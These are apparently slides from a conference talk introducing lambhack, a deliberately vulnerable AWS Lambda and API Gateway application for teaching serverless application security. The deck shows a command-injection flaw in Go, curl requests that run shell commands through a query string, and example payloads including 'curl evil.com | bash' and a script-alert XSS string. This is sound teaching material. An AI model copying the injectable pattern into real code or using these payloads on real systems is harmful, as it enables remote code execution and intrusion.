lambhack: a vulnerable serverless application

CLOUD AUSTIN @WICKETT

LAMBHACK: A VULNERABLE

SERVERLESS APPLICATION

JAMES WICKETT


Development of highly-resilient, distributed systems is now

easier than ever with serverless, however application security is

more important than ever before.

WHY IT MATTERS


‣ HEAD OF RESEARCH AT SIGNAL SCIENCES

‣ DEVOPS DAYS AUSTIN ORGANIZER

‣ AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM

‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM

JAMES WICKETT

http://lynda.com

http://theagileadmin.com

http://labs.signalsciences.com


Serverless encourages functions as deploy units and run as one-time*, read-only containers*, coupled with

third party services that allow running end-to-end applications without

worrying about system operation.

SERVERLESS DEFINITION

* - there is container reuse and writability


VMsHardware Serverless

Inspiration from @adrianco

Waste

Value


http://martinfowler.com/articles/serverless.html

API GATEWAY


CI/CD auth

wordpress scraper

event ingestion chatbots

load testing

MORE SERVERLESS USE CASES


Security


‣ SECURE SOFTWARE SUPPLY CHAIN

‣ DELIVERY PIPELINE

‣ DATA FLOW SECURITY

‣ ATTACK DETECTION

FOUR AREAS OF SERVERLESS SECURITY


https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds



CLOUD AUSTIN @WICKETThttps://medium.com/

@PaulDJohnston/security-and-serverless-ec52817385c4

https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4




INSPIRED BY WEB GOAT AND ALL THE OTHER

GOATS…


‣ SERVERLESS HAS A FALSE SENSE OF SECURITY

‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)

‣ WANTED TO SEE MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS

‣ A VULNERABLE LAMBDA + API GATEWAY STACK

‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS…

INTRODUCING LAMBHACK


‣ A VULNERABLE LAMBDA + API GATEWAY STACK

‣ OPEN SOURCE, MIT LICENSED

‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING

‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP

‣ GITHUB.COM/WICKETT/LAMBHACK

github.com/wickett/lamback

http://github.com/wickett/lambhack


‣ GOLANG!

‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY

‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM

‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES

GO SPARTA


‣ CLOUDWATCH EVENTS AND LOGS

‣ DYNAMODB, KINESIS,

‣ S3

‣ SES, SNS

‣ API GATEWAY CREATION

GO SPARTA INCLUDES


lambhack is a vulnerable serverless lambda application

It would certainly be a bad idea to base any coding patterns off

what you see here.


WHY IS THIS BAD?

command := lambdaEvent.QueryParams[“args"]

output := runner.Run(command)


With command execution available to us in

lambhack, we can poke around the container a bit


UNAME -A

$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"

> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux


CAT /PROC/VERSION$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1”

> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016


LET’S LOOK IN /TMP

$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"

total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64


LAMBDA REUSE IN ACTION!

$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"

$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1”

$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/args=ls+/tmp;+sleep+1"

> Sparta.lambda.amd64 wickettfile


WHICH CURL

$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"

> /usr/bin/curl


GOT PROXY?$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=curl+https://www.example.com;+sleep+1" > "<!doctype html>\n<html>\n<head>\n <title>Example Domain</title>\n\n <meta charset=\"utf-8\" />\n <meta http-equiv=\"Content-type\" content=\"text/html; charset=utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\n <style type=\"text/css\">\n body {\n background-color: #f0f0f2;\n margin: 0;\n padding: 0;\n font-family: \"Open Sans\", \"Helvetica Neue\", Helvetica, Arial, sans-serif;\n \n }\n div {\n width: 600px;\n margin: 5em auto;\n padding: 50px;\n background-color: #fff;\n border-radius: 1em;\n }\n a:link, a:visited {\n color: #38488f;\n text-decoration: none;\n }\n @media (max-width: 700px) {\n body {\n background-color: #fff;\n }\n div {\n width: auto;\n margin: 0 auto;\n border-radius: 0;\n padding: 1em;\n }\n }\n </style> \n</head>\n\n<body>\n<div>\n <h1>Example Domain</h1>\n <p>This domain is established to be used for illustrative examples in documents. You may use this\n domain in examples without prior coordination or asking for permission.</p>\n <p><a href=\"http://www.iana.org/domains/example\">More information...</a></p>\n</div>\n</body>\n</html>\n"

bit.ly/lh-demo1


‣ HELP NEEDED

‣ ADD XSS AND OTHER ATTACKS

‣ ADD AUTH VECTORS AND EXAMPLES

‣ NEEDS A UI PLEASE!

‣ PULL REQUESTS ACCEPTED :)

FUTURE OF LAMBHACK


APPLICATION SECURITY IS STILL RELEVANT 15+

YEARS LATER


‣ New surface area, similar appsec problems

‣ Command Exec, XSS, Injection Attacks

‣ All the OWASP Top Ten

‣ What is old is new.

‣ Appending ‘curl evil.com | bash’

‣ Add <script>alert(1)</script> to a filename you upload on s3

TYPES OF ATTACKS

http://evil.com


Development of highly-resilient, distributed systems is now

easier than ever with serverless, however application security is

more important than ever before.

WHY IT MATTERS


WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS?

Send an email to [email protected]

mailto:[email protected]

lambhack: a vulnerable serverless application

Software